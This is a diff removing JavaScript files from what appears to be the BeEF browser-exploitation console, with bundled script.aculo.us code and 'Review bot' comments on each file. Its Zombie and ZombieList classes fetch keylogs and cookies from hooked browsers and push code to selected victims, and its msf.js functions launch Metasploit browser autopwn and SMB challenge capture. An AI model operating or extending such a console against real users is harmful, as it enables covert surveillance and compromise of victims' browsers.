[ new Effect.Move(element, {x: 0, y: 100, sync: true }),
new Effect.Opacity(element, { sync: true, to: 0.0 }) ],
Object.extend(
{ duration: 0.5,
beforeSetup: function(effect) {
effect.effects[0].element.makePositioned();
},
afterFinishInternal: function(effect) {
effect.effects[0].element.hide();
effect.effects[0].element.undoPositioned();
effect.effects[0].element.setStyle(oldStyle);
}
}, arguments[1] || {}));
}
Effect.Shake = function(element) {
element = $(element);
var oldStyle = {
top: element.getStyle('top'),
left: element.getStyle('left') };
return new Effect.Move(element,
{ x: 20, y: 0, duration: 0.05, afterFinishInternal: function(effect) {
new Effect.Move(effect.element,
{ x: -40, y: 0, duration: 0.1, afterFinishInternal: function(effect) {
new Effect.Move(effect.element,
{ x: 40, y: 0, duration: 0.1, afterFinishInternal: function(effect) {
new Effect.Move(effect.element,
{ x: -40, y: 0, duration: 0.1, afterFinishInternal: function(effect) {
new Effect.Move(effect.element,
{ x: 40, y: 0, duration: 0.1, afterFinishInternal: function(effect) {
new Effect.Move(effect.element,
{ x: -20, y: 0, duration: 0.05, afterFinishInternal: function(effect) {
effect.element.undoPositioned();
effect.element.setStyle(oldStyle);
}}) }}) }}) }}) }}) }});
}
Effect.SlideDown = function(element) {
element = $(element);
element.cleanWhitespace();
// SlideDown need to have the content of the element wrapped in a container element with fixed height!
var oldInnerBottom = $(element.firstChild).getStyle('bottom');
var elementDimensions = element.getDimensions();
return new Effect.Scale(element, 100, Object.extend({
scaleContent: false,
scaleX: false,
scaleFrom: window.opera ? 0 : 1,
scaleMode: {originalHeight: elementDimensions.height, originalWidth: elementDimensions.width},
restoreAfterFinish: true,
afterSetup: function(effect) {
effect.element.makePositioned();
effect.element.firstChild.makePositioned();
if(window.opera) effect.element.setStyle({top: ''});
effect.element.makeClipping();
effect.element.setStyle({height: '0px'});
effect.element.show(); },
afterUpdateInternal: function(effect) {
effect.element.firstChild.setStyle({bottom:
(effect.dims[0] - effect.element.clientHeight) + 'px' });
},
afterFinishInternal: function(effect) {
effect.element.undoClipping();
// IE will crash if child is undoPositioned first
if(/MSIE/.test(navigator.userAgent)){
effect.element.undoPositioned();
effect.element.firstChild.undoPositioned();
}else{
effect.element.firstChild.undoPositioned();
effect.element.undoPositioned();
}
effect.element.firstChild.setStyle({bottom: oldInnerBottom}); }
}, arguments[1] || {})
);
}
Effect.SlideUp = function(element) {
element = $(element);
element.cleanWhitespace();
var oldInnerBottom = $(element.firstChild).getStyle('bottom');
return new Effect.Scale(element, window.opera ? 0 : 1,
Object.extend({ scaleContent: false,
scaleX: false,
scaleMode: 'box',
scaleFrom: 100,
restoreAfterFinish: true,
beforeStartInternal: function(effect) {
effect.element.makePositioned();
effect.element.firstChild.makePositioned();
if(window.opera) effect.element.setStyle({top: ''});
effect.element.makeClipping();
effect.element.show(); },
afterUpdateInternal: function(effect) {
effect.element.firstChild.setStyle({bottom:
(effect.dims[0] - effect.element.clientHeight) + 'px' }); },
afterFinishInternal: function(effect) {
effect.element.hide();
effect.element.undoClipping();
effect.element.firstChild.undoPositioned();
effect.element.undoPositioned();
effect.element.setStyle({bottom: oldInnerBottom}); }
}, arguments[1] || {})
);
}
// Bug in opera makes the TD containing this element expand for a instance after finish
Effect.Squish = function(element) {
return new Effect.Scale(element, window.opera ? 1 : 0,
{ restoreAfterFinish: true,
beforeSetup: function(effect) {
effect.element.makeClipping(effect.element); },
afterFinishInternal: function(effect) {
effect.element.hide(effect.element);
effect.element.undoClipping(effect.element); }
});
}
Effect.Grow = function(element) {
element = $(element);
var options = Object.extend({
direction: 'center',
moveTransition: Effect.Transitions.sinoidal,
scaleTransition: Effect.Transitions.sinoidal,
opacityTransition: Effect.Transitions.full
}, arguments[1] || {});
var oldStyle = {
top: element.style.top,
left: element.style.left,
height: element.style.height,
width: element.style.width,
opacity: element.getInlineOpacity() };
var dims = element.getDimensions();
var initialMoveX, initialMoveY;
var moveX, moveY;
switch (options.direction) {
case 'top-left':
initialMoveX = initialMoveY = moveX = moveY = 0;
break;
case 'top-right':
initialMoveX = dims.width;
initialMoveY = moveY = 0;
moveX = -dims.width;
break;
case 'bottom-left':
initialMoveX = moveX = 0;
initialMoveY = dims.height;
moveY = -dims.height;
break;
case 'bottom-right':
initialMoveX = dims.width;
initialMoveY = dims.height;
moveX = -dims.width;
moveY = -dims.height;
break;
case 'center':
initialMoveX = dims.width / 2;
initialMoveY = dims.height / 2;
moveX = -dims.width / 2;
moveY = -dims.height / 2;
break;
}
return new Effect.Move(element, {
x: initialMoveX,
y: initialMoveY,
duration: 0.01,
beforeSetup: function(effect) {
effect.element.hide();
effect.element.makeClipping();
effect.element.makePositioned();
},
afterFinishInternal: function(effect) {
new Effect.Parallel(
[ new Effect.Opacity(effect.element, { sync: true, to: 1.0, from: 0.0, transition: options.opacityTransition }),
new Effect.Move(effect.element, { x: moveX, y: moveY, sync: true, transition: options.moveTransition }),
new Effect.Scale(effect.element, 100, {
scaleMode: { originalHeight: dims.height, originalWidth: dims.width },
sync: true, scaleFrom: window.opera ? 1 : 0, transition: options.scaleTransition, restoreAfterFinish: true})
], Object.extend({
beforeSetup: function(effect) {
effect.effects[0].element.setStyle({height: '0px'});
effect.effects[0].element.show();
},
afterFinishInternal: function(effect) {
effect.effects[0].element.undoClipping();
effect.effects[0].element.undoPositioned();
effect.effects[0].element.setStyle(oldStyle);
}
}, options)
)
}
});
}
Effect.Shrink = function(element) {
element = $(element);
var options = Object.extend({
direction: 'center',
moveTransition: Effect.Transitions.sinoidal,
scaleTransition: Effect.Transitions.sinoidal,
opacityTransition: Effect.Transitions.none
}, arguments[1] || {});
var oldStyle = {
top: element.style.top,
left: element.style.left,
height: element.style.height,
width: element.style.width,
opacity: element.getInlineOpacity() };
var dims = element.getDimensions();
var moveX, moveY;
switch (options.direction) {
case 'top-left':
moveX = moveY = 0;
break;
case 'top-right':
moveX = dims.width;
moveY = 0;
break;
case 'bottom-left':
moveX = 0;
moveY = dims.height;
break;
case 'bottom-right':
moveX = dims.width;
moveY = dims.height;
break;
case 'center':
moveX = dims.width / 2;
moveY = dims.height / 2;
break;
}
return new Effect.Parallel(
[ new Effect.Opacity(element, { sync: true, to: 0.0, from: 1.0, transition: options.opacityTransition }),
new Effect.Scale(element, window.opera ? 1 : 0, { sync: true, transition: options.scaleTransition, restoreAfterFinish: true}),
new Effect.Move(element, { x: moveX, y: moveY, sync: true, transition: options.moveTransition })
], Object.extend({
beforeStartInternal: function(effect) {
effect.effects[0].element.makePositioned();
effect.effects[0].element.makeClipping(); },
afterFinishInternal: function(effect) {
effect.effects[0].element.hide();
effect.effects[0].element.undoClipping();
effect.effects[0].element.undoPositioned();
effect.effects[0].element.setStyle(oldStyle); }
}, options)
);
}
Effect.Pulsate = function(element) {
element = $(element);
var options = arguments[1] || {};
var oldOpacity = element.getInlineOpacity();
var transition = options.transition || Effect.Transitions.sinoidal;
var reverser = function(pos){ return transition(1-Effect.Transitions.pulse(pos)) };
reverser.bind(transition);
return new Effect.Opacity(element,
Object.extend(Object.extend({ duration: 3.0, from: 0,
afterFinishInternal: function(effect) { effect.element.setStyle({opacity: oldOpacity}); }
}, options), {transition: reverser}));
}
Effect.Fold = function(element) {
element = $(element);
var oldStyle = {
top: element.style.top,
left: element.style.left,
width: element.style.width,
height: element.style.height };
Element.makeClipping(element);
return new Effect.Scale(element, 5, Object.extend({
scaleContent: false,
scaleX: false,
afterFinishInternal: function(effect) {
new Effect.Scale(element, 1, {
scaleContent: false,
scaleY: false,
afterFinishInternal: function(effect) {
effect.element.hide();
effect.element.undoClipping();
effect.element.setStyle(oldStyle);
} });
}}, arguments[1] || {}));
};
['setOpacity','getOpacity','getInlineOpacity','forceRerendering','setContentZoom',
'collectTextNodes','collectTextNodesIgnoreClass','childrenWithClassName'].each(
function(f) { Element.Methods[f] = Element[f]; }
);
Element.Methods.visualEffect = function(element, effect, options) {
s = effect.gsub(/_/, '-').camelize();
effect_class = s.charAt(0).toUpperCase() + s.substring(1);
new Effect[effect_class](element, options);
return $(element);
};
Element.addMethods();
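Review bot: `Element.Methods.visualEffect` assigns `s` and `effect_class` without `var`, so both become implicit globals that any other script on the page can overwrite between calls; declare them with `var`. In `Effect.Pulsate`, the result of `reverser.bind(transition)` is discarded, so that line has no effect and can be dropped or its return value assigned.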


@@ -1,30 +0,0 @@
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
function refreshlog() {
new Ajax.Updater('logdata', 'logcontrol.php?action=refresh', {asynchronous:true});
update_log_div('logdyn', 'summary');
}
function clearlog() {
new Ajax.Updater('logdata', 'logcontrol.php?action=clear', {asynchronous:false});
refreshlog();
}
function update_log_div(div, action) {
new Ajax.Updater(div, 'logcontrol.php?action=' + action, {asynchronous:true});
}
// --[ LOG CLASS
var Log = Class.create();
Log.prototype = {
initialize: function(frequency) {
this.version = '0.1',
this.authors = 'Wade Alcorn <wade@bindshell.net>',
this.frequency = frequency
},
heartbeat: function() {
update_log_div('logdyn', 'summary');
}
}
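Review bot: `clearlog()` sends the destructive `action=clear` request with only the action name in the query string and no anti-CSRF token or confirmation step, so if `logcontrol.php` relies on the session cookie alone, any page that can make the operator's browser request that URL can wipe the log. Carry a per-session token as a request parameter and verify it server-side. The same call uses `asynchronous:false`, which blocks the console until the server answers. In `Log.initialize` the assignments end in commas rather than semicolons; it works through the comma operator but reads like an object literal and should be terminated normally.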


@@ -1,25 +0,0 @@
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// --[ ZOMBIELIST CLASS
var Module = Class.create();
Module.prototype = {
initialize: function(frequency) {
this.version = '0.1',
this.authors = 'Wade Alcorn <wade@bindshell.net>',
this.frequency = frequency,
this.id = 0;
},
heartbeat: function() {
new Ajax.Updater('module_results_section', 'get_module_details.php?action=get&result_id=' + this.id, {asynchronous:true});
},
delete_results: function() {
new Ajax.Updater('module_results_section', 'get_module_details.php?action=delete&result_id=' + this.id, {asynchronous:true});
this.heartbeat();
},
set_results_id: function(id) {
this.id = id;
}
}
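Review bot: `delete_results` fires an asynchronous delete and then immediately calls `this.heartbeat()`, which issues a second asynchronous `action=get` into the same `module_results_section` element; the two responses can arrive in either order, so the panel may end up showing the pre-delete results. Trigger the refresh from the delete request's completion callback instead. The banner comment reads `ZOMBIELIST CLASS` although the class defined here is `Module`.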

115
js/msf.js

@@ -1,115 +0,0 @@
// Javascript for BeefSploit modules
// By Ryan Linn (sussurro@happypacket.net)
// Excuse the mess, we are remodeling
var exploit_delay = 20000;
// --[ MSF GET EXPLOIT LIST
// get the list of exploits
function msf_get_exploit_list() {
url = 'action=getexploits';
msf_request(url, 'exploits', msf_get_payload_list);
}
// --[ MSF GET PAYLOAD LIST
// get relevant payload list
function msf_get_payload_list() {
url = 'action=getpayloads&exploit=' + $('exploit').value;
msf_request(url, 'payloads', msf_get_options);
}
// --[ MSG GET OPTIONS
// get relevant options for exploit and payload
function msf_get_options() {
url = 'action=getoptions&exploit=' + $('exploit').value + "&payload=" + $('payload').value;
msf_request(url, 'options', null);
}
// --[ MSF REQUEST
// generic request for msf data and actions
function msf_request(param_string, update_div, on_success_function) {
new Ajax.Request('msf.php?' + param_string,
{
method:'get',
onSuccess: function(transport){
// update div
if( (update_div != undefined) && (update_div != null) ) {
$(update_div).innerHTML = transport.responseText;
}
// onsuccess fuction
if( (on_success_function != undefined) && (on_success_function != null) ) {
on_success_function(transport.responseText);
}
},
asynchronous:true
});
}
// --[ MSF EXPLOIT
// after a delay direct selected zombies to the exploit
function msf_exploit(responseText) {
window.setTimeout('Element.Methods.construct_code("' + responseText + '")', exploit_delay);
}
function msf_callAuxiliary() {
opts = form_to_params();
url = 'action=auxiliary&' + opts;
msf_request(url, null, msf_exploit);
}
function msf_smb_challenge_capture() {
opts = form_to_params();
url = 'action=smbchallengecapture&' + opts;
msf_request(url, null, msf_exploit);
}
function msf_browser_autopwn() {
opts = form_to_params();
url = 'action=browserautopwn&' + opts;
msf_request(url, null, msf_exploit);
}
function msf_execute_module() {
opts = form_to_params();
url = 'action=exploit&' + opts;
msf_request(url, null, msf_exploit);
}
// --[ FORM TO PARAMS
// convert the form to a URL params string and return it
function form_to_params() {
var opts = "";
for(i = 0; i < document.myform.elements.length; i++) {
if(document.myform.elements[i].name != "" && document.myform.elements[i].value != "") {
if(document.myform.elements[i].type == "checkbox" && document.myform.elements[i].checked == false) {
continue;
}
if(i > 0 ) {
opts = opts + "&";
}
opts = opts + document.myform.elements[i].name + "=";
opts = opts + document.myform.elements[i].value;
}
}
return opts;
}
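Review bot: `msf_exploit` splices `responseText` into a source string handed to `window.setTimeout`, so the server response is evaluated as code and any double quote or newline in it either breaks the call or injects script into the operator's console. Pass a function instead, for example `window.setTimeout(function(){ Element.Methods.construct_code(responseText); }, exploit_delay)`. `msf_request` has the same trust problem when it writes `transport.responseText` straight into `innerHTML`. In `form_to_params`, names and values are concatenated without `encodeURIComponent`, so a value containing `&` or `=` alters the parameter list, and the `i > 0` test emits a leading `&` whenever the first form element is skipped. `url`, `opts` and `i` are all implicit globals and should be declared with `var`.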

2006
js/prototype.js vendored

File diff suppressed because it is too large


@@ -1,47 +0,0 @@
// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
var Scriptaculous = {
Version: '1.6.2',
require: function(libraryName) {
// inserting via DOM fails in Safari 2.0, so brute force approach
document.write('<script type="text/javascript" src="'+libraryName+'"></script>');
},
load: function() {
if((typeof Prototype=='undefined') ||
(typeof Element == 'undefined') ||
(typeof Element.Methods=='undefined') ||
parseFloat(Prototype.Version.split(".")[0] + "." +
Prototype.Version.split(".")[1]) < 1.5)
throw("script.aculo.us requires the Prototype JavaScript framework >= 1.5.0");
$A(document.getElementsByTagName("script")).findAll( function(s) {
return (s.src && s.src.match(/scriptaculous\.js(\?.*)?$/))
}).each( function(s) {
var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,'');
var includes = s.src.match(/\?.*load=([a-z,]*)/);
(includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each(
function(include) { Scriptaculous.require(path+include+'.js') });
});
}
}
Scriptaculous.load();
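Review bot: the version guard in `load` builds "major.minor" as a string and compares it with `parseFloat(...) < 1.5`, which treats a Prototype version such as 1.10 as 1.1 and would reject it. Compare the major and minor components as separate integers. `require` also injects script tags with `document.write` using a path derived from the including tag's `src`; the `load=` list is limited to `[a-z,]*` by the regex, which is the only thing keeping that path under control, so it deserves a comment saying so.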


@@ -1,292 +0,0 @@
// Copyright (c) 2005 Marty Haught, Thomas Fuchs
//
// See http://script.aculo.us for more info
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
if(!Control) var Control = {};
Control.Slider = Class.create();
// options:
// axis: 'vertical', or 'horizontal' (default)
//
// callbacks:
// onChange(value)
// onSlide(value)
Control.Slider.prototype = {
initialize: function(handle, track, options) {
var slider = this;
if(handle instanceof Array) {
this.handles = handle.collect( function(e) { return $(e) });
} else {
this.handles = [$(handle)];
}
this.track = $(track);
this.options = options || {};
this.axis = this.options.axis || 'horizontal';
this.increment = this.options.increment || 1;
this.step = parseInt(this.options.step || '1');
this.range = this.options.range || $R(0,1);
this.value = 0; // assure backwards compat
this.values = this.handles.map( function() { return 0 });
this.spans = this.options.spans ? this.options.spans.map(function(s){ return $(s) }) : false;
this.options.startSpan = $(this.options.startSpan || null);
this.options.endSpan = $(this.options.endSpan || null);
this.restricted = this.options.restricted || false;
this.maximum = this.options.maximum || this.range.end;
this.minimum = this.options.minimum || this.range.start;
// Will be used to align the handle onto the track, if necessary
this.alignX = parseInt(this.options.alignX || '0');
this.alignY = parseInt(this.options.alignY || '0');
this.trackLength = this.maximumOffset() - this.minimumOffset();
this.handleLength = this.isVertical() ?
(this.handles[0].offsetHeight != 0 ?
this.handles[0].offsetHeight : this.handles[0].style.height.replace(/px$/,"")) :
(this.handles[0].offsetWidth != 0 ? this.handles[0].offsetWidth :
this.handles[0].style.width.replace(/px$/,""));
this.active = false;
this.dragging = false;
this.disabled = false;
if(this.options.disabled) this.setDisabled();
// Allowed values array
this.allowedValues = this.options.values ? this.options.values.sortBy(Prototype.K) : false;
if(this.allowedValues) {
this.minimum = this.allowedValues.min();
this.maximum = this.allowedValues.max();
}
this.eventMouseDown = this.startDrag.bindAsEventListener(this);
this.eventMouseUp = this.endDrag.bindAsEventListener(this);
this.eventMouseMove = this.update.bindAsEventListener(this);
// Initialize handles in reverse (make sure first handle is active)
this.handles.each( function(h,i) {
i = slider.handles.length-1-i;
slider.setValue(parseFloat(
(slider.options.sliderValue instanceof Array ?
slider.options.sliderValue[i] : slider.options.sliderValue) ||
slider.range.start), i);
Element.makePositioned(h); // fix IE
Event.observe(h, "mousedown", slider.eventMouseDown);
});
Event.observe(this.track, "mousedown", this.eventMouseDown);
Event.observe(document, "mouseup", this.eventMouseUp);
Event.observe(document, "mousemove", this.eventMouseMove);
this.initialized = true;
},
dispose: function() {
var slider = this;
Event.stopObserving(this.track, "mousedown", this.eventMouseDown);
Event.stopObserving(document, "mouseup", this.eventMouseUp);
Event.stopObserving(document, "mousemove", this.eventMouseMove);
this.handles.each( function(h) {
Event.stopObserving(h, "mousedown", slider.eventMouseDown);
});
},
setDisabled: function(){
this.disabled = true;
},
setEnabled: function(){
this.disabled = false;
},
getNearestValue: function(value){
if(this.allowedValues){
if(value >= this.allowedValues.max()) return(this.allowedValues.max());
if(value <= this.allowedValues.min()) return(this.allowedValues.min());
var offset = Math.abs(this.allowedValues[0] - value);
var newValue = this.allowedValues[0];
this.allowedValues.each( function(v) {
var currentOffset = Math.abs(v - value);
if(currentOffset <= offset){
newValue = v;
offset = currentOffset;
}
});
return newValue;
}
if(value > this.range.end) return this.range.end;
if(value < this.range.start) return this.range.start;
return value;
},
setValue: function(sliderValue, handleIdx){
if(!this.active) {
this.activeHandleIdx = handleIdx || 0;
this.activeHandle = this.handles[this.activeHandleIdx];
this.updateStyles();
}
handleIdx = handleIdx || this.activeHandleIdx || 0;
if(this.initialized && this.restricted) {
if((handleIdx>0) && (sliderValue<this.values[handleIdx-1]))
sliderValue = this.values[handleIdx-1];
if((handleIdx < (this.handles.length-1)) && (sliderValue>this.values[handleIdx+1]))
sliderValue = this.values[handleIdx+1];
}
sliderValue = this.getNearestValue(sliderValue);
this.values[handleIdx] = sliderValue;
this.value = this.values[0]; // assure backwards compat
this.handles[handleIdx].style[this.isVertical() ? 'top' : 'left'] =
this.translateToPx(sliderValue);
this.drawSpans();
if(!this.dragging || !this.event) this.updateFinished();
},
setValueBy: function(delta, handleIdx) {
this.setValue(this.values[handleIdx || this.activeHandleIdx || 0] + delta,
handleIdx || this.activeHandleIdx || 0);
},
translateToPx: function(value) {
return Math.round(
((this.trackLength-this.handleLength)/(this.range.end-this.range.start)) *
(value - this.range.start)) + "px";
},
translateToValue: function(offset) {
return ((offset/(this.trackLength-this.handleLength) *
(this.range.end-this.range.start)) + this.range.start);
},
getRange: function(range) {
var v = this.values.sortBy(Prototype.K);
range = range || 0;
return $R(v[range],v[range+1]);
},
minimumOffset: function(){
return(this.isVertical() ? this.alignY : this.alignX);
},
maximumOffset: function(){
return(this.isVertical() ?
(this.track.offsetHeight != 0 ? this.track.offsetHeight :
this.track.style.height.replace(/px$/,"")) - this.alignY :
(this.track.offsetWidth != 0 ? this.track.offsetWidth :
this.track.style.width.replace(/px$/,"")) - this.alignY);
},
isVertical: function(){
return (this.axis == 'vertical');
},
drawSpans: function() {
var slider = this;
if(this.spans)
$R(0, this.spans.length-1).each(function(r) { slider.setSpan(slider.spans[r], slider.getRange(r)) });
if(this.options.startSpan)
this.setSpan(this.options.startSpan,
$R(0, this.values.length>1 ? this.getRange(0).min() : this.value ));
if(this.options.endSpan)
this.setSpan(this.options.endSpan,
$R(this.values.length>1 ? this.getRange(this.spans.length-1).max() : this.value, this.maximum));
},
setSpan: function(span, range) {
if(this.isVertical()) {
span.style.top = this.translateToPx(range.start);
span.style.height = this.translateToPx(range.end - range.start + this.range.start);
} else {
span.style.left = this.translateToPx(range.start);
span.style.width = this.translateToPx(range.end - range.start + this.range.start);
}
},
updateStyles: function() {
this.handles.each( function(h){ Element.removeClassName(h, 'selected') });
Element.addClassName(this.activeHandle, 'selected');
},
startDrag: function(event) {
if(Event.isLeftClick(event)) {
if(!this.disabled){
this.active = true;
var handle = Event.element(event);
var pointer = [Event.pointerX(event), Event.pointerY(event)];
var track = handle;
if(track==this.track) {
var offsets = Position.cumulativeOffset(this.track);
this.event = event;
this.setValue(this.translateToValue(
(this.isVertical() ? pointer[1]-offsets[1] : pointer[0]-offsets[0])-(this.handleLength/2)
));
var offsets = Position.cumulativeOffset(this.activeHandle);
this.offsetX = (pointer[0] - offsets[0]);
this.offsetY = (pointer[1] - offsets[1]);
} else {
// find the handle (prevents issues with Safari)
while((this.handles.indexOf(handle) == -1) && handle.parentNode)
handle = handle.parentNode;
this.activeHandle = handle;
this.activeHandleIdx = this.handles.indexOf(this.activeHandle);
this.updateStyles();
var offsets = Position.cumulativeOffset(this.activeHandle);
this.offsetX = (pointer[0] - offsets[0]);
this.offsetY = (pointer[1] - offsets[1]);
}
}
Event.stop(event);
}
},
update: function(event) {
if(this.active) {
if(!this.dragging) this.dragging = true;
this.draw(event);
// fix AppleWebKit rendering
if(navigator.appVersion.indexOf('AppleWebKit')>0) window.scrollBy(0,0);
Event.stop(event);
}
},
draw: function(event) {
var pointer = [Event.pointerX(event), Event.pointerY(event)];
var offsets = Position.cumulativeOffset(this.track);
pointer[0] -= this.offsetX + offsets[0];
pointer[1] -= this.offsetY + offsets[1];
this.event = event;
this.setValue(this.translateToValue( this.isVertical() ? pointer[1] : pointer[0] ));
if(this.initialized && this.options.onSlide)
this.options.onSlide(this.values.length>1 ? this.values : this.value, this);
},
endDrag: function(event) {
if(this.active && this.dragging) {
this.finishDrag(event, true);
Event.stop(event);
}
this.active = false;
this.dragging = false;
},
finishDrag: function(event, success) {
this.active = false;
this.dragging = false;
this.updateFinished();
},
updateFinished: function() {
if(this.initialized && this.options.onChange)
this.options.onChange(this.values.length>1 ? this.values : this.value, this);
this.event = null;
}
}
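Review bot: in `maximumOffset` the horizontal branch subtracts `this.alignY` from the track width, while `minimumOffset` uses `this.alignX` for the same axis; with differing `alignX` and `alignY` options the computed `trackLength` is wrong for horizontal sliders. The last term should be `this.alignX`. The fallback `style.height.replace(/px$/,"")` also returns a string, so the subtraction relies on implicit coercion; wrap it in `parseInt`. In `startDrag`, `var offsets` is declared twice in the same function.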


@@ -1,200 +0,0 @@
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
function update_zombie_div(div, id, detail) {
new Ajax.Updater(div, 'get_zombie_details.php?zombie=' + id + '&detail=' + detail, {asynchronous:true});
}
// --[ ZOMBIE CLASS
var Zombie = Class.create();
Zombie.prototype = {
initialize: function(id, frequency) {
this.version = '0.1',
this.authors = 'Wade Alcorn <wade@bindshell.net>, Alexios Fakos <beef.20.alfa@spamgourmet.com>',
this.frequency = frequency,
this.id = id,
this.ip = '',
this.agent_image = '',
this.os_image = ''
},
create_button: function(highlighted) {
},
get_results: function() {
update_zombie_div('zombie_results_data', this.id, 'results');
},
get_keylog: function() {
update_zombie_div('keylog_data', this.id, 'keylog');
},
get_static_data: function() {
update_zombie_div('os_data', this.id, 'os');
update_zombie_div('browser_data', this.id, 'browser');
update_zombie_div('screen_data', this.id, 'screen');
update_zombie_div('cookie_data', this.id, 'cookie');
update_zombie_div('content_data', this.id, 'content');
update_zombie_div('loc_data', this.id, 'loc');
update_zombie_div('keylog_data', this.id, 'keylog');
update_zombie_div('zombie_results_data', this.id, 'results');
},
set_id: function(zombie) {
this.id = zombie;
this.get_static_data();
this.get_results();
this.get_keylog();
element = Builder.node('div',{id:'zombie_header'},[
Builder.node('img',{src:'/beef/images/' + this.agent_image,border:"0",height:"16",width:"16"}),
Builder.node('img',{src:'/beef/images/' + this.os_image,border:"0",height:"16",width:"16"}),
" " + this.ip
]);
$('zombie_icons').innerHTML = "";
$('zombie_icons').appendChild(element);
},
heartbeat: function() {
this.get_results();
this.get_keylog();
}
}
// --[ ZOMBIELIST CLASS
var ZombieList = Class.create();
ZombieList.prototype = {
initialize: function(frequency) {
this.version = '0.1',
this.authors = 'Wade Alcorn <wade@bindshell.net>, Alexios Fakos <beef.20.alfa@spamgourmet.com>',
this.frequency = frequency,
this.zombies = new Array();
this.selected_zombies = new Array();
this.zombie_data = new Array();
this.zombie_ids = new Array();
this.new_zombies = new Array();
this.expired_zombies = new Array();
this.current_zombie = 'none';
this.zombie = new Zombie(this.current_zombie, this.frequency);
},
update: function() {
var x = new Ajax.Request(
'get_zombie_details.php?zombie=all&detail=list',
{
method: 'get',
asynchronous: false,
evalScripts: false,
// parameters: 'func=' + func + '&zombie=' + this.zombie
}
);
var raw_zom_id_str = x.transport.responseText;
if(raw_zom_id_str.match(/none/)) {
$('zombiesdyn').innerHTML = "No Zombies Available";
return;
} else if (this.zombie_ids.length == 0) {
$('zombiesdyn').innerHTML = "";
}
zom_id_arr = raw_zom_id_str.split(',');
this.new_zombies = diff(zom_id_arr, this.zombie_ids);
this.expired_zombies = diff(this.zombie_ids, zom_id_arr);
this.expired_zombies = this.expired_zombies.unique();
this.zombie_ids = this.zombies.concat(zom_id_arr);
this.zombie_ids = this.zombie_ids.unique();
for(var i = 0; i < this.new_zombies.length; i++) {
this.add(this.new_zombies[i]);
}
for(var i = 0; i < this.expired_zombies.length; i++) {
$('zombiesdyn').removeChild(this.zombie_data[this.expired_zombies[i]]['button_element']);
}
},
add: function(zombie_id) {
this.zombie_data[zombie_id] = new Array();
var x = new Ajax.Request(
'get_zombie_details.php?zombie=' + zombie_id + '&detail=metadata',
{
method: 'get',
asynchronous: false,
evalScripts: false,
}
);
var raw_zom_id_str = x.transport.responseText;
zombie_details_arr = raw_zom_id_str.split(',');
this.zombie_data[zombie_id]['ip'] = zombie_details_arr[0];
this.zombie_data[zombie_id]['agent_image'] = zombie_details_arr[1];
this.zombie_data[zombie_id]['os_image'] = zombie_details_arr[2];
element = Builder.node('div',{id:'zombies'},[
Builder.node('a',{href:"javascript:select_zombie('" + zombie_id + "')"},[
Builder.node('img',{src:'/beef/images/' + this.zombie_data[zombie_id]['agent_image'],align:"top",border:"0",height:"12",width:"12"}),
Builder.node('img',{src:'/beef/images/' + this.zombie_data[zombie_id]['os_image'],align:"top",border:"0",height:"12",width:"12"}),
Builder.node('div',{id:'zombietext'},[this.zombie_data[zombie_id]['ip']]),
]),
]);
this.zombie_data[zombie_id]['button_element'] = element;
$('zombiesdyn').appendChild(element);
},
highlight_button: function(zombie_id) {
this.zombie_data[zombie_id]['button_element'].style.backgroundColor='#CCCCCC'
},
unhighlight_button: function(zombie_id) {
this.zombie_data[zombie_id]['button_element'].style.backgroundColor='#FFFFFF'
},
select_zombie: function(zombie_id) {
if(this.selected_zombies.indexOf(zombie_id) < 0) {
this.selected_zombies.push(zombie_id);
this.highlight_button(zombie_id);
} else {
this.selected_zombies.splice(this.selected_zombies.indexOf(zombie_id),1);
this.unhighlight_button(zombie_id);
}
},
send_code: function(code) {
if(!this.selected_zombies.length) {
beef_error('No Zombie Selected. Select zombie(s) in the sidebar');
}
// this is a work-around for a bug in Ajax.Updater - it doens't like '==' in a get param
if(decode64(code).length%3 == 1) {
tmp_code = decode64(code);
tmp_code += ";";
code = encode64(tmp_code);
}
this.selected_zombies.each( function(id) {
var params = 'data='+code;
new Ajax.Updater('module_status', 'send_cmds.php?action=cmd&zombie=' + id, {method:'post',parameters:params,asynchronous:false});
});
},
heartbeat: function() {
this.update();
this.zombie.heartbeat();
// update menu
update_zombie_div('zombie_menu', 'none', 'menu');
},
